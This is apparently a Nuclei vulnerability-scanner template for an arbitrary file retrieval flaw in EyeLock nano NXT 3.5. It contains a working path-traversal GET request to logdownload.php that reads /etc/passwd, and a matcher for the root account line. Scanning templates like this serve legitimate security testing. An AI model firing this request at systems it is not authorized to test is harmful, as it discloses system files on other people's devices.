nuclei-templates/vulnerabilities/other/eyelock-nano-lfd.yaml

29 lines
857 B
YAML

id: eyelock-nano-lfd
info:
name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval
author: geeknik
severity: high
description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This
can be exploited to disclose contents of files from local resources.
reference:
- https://www.zeroscience.mk/codes/eyelock_lfd.txt
tags: iot,lfi,eyelock
requests:
- method: GET
path:
- "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
# Enhanced by mp on 2022/04/08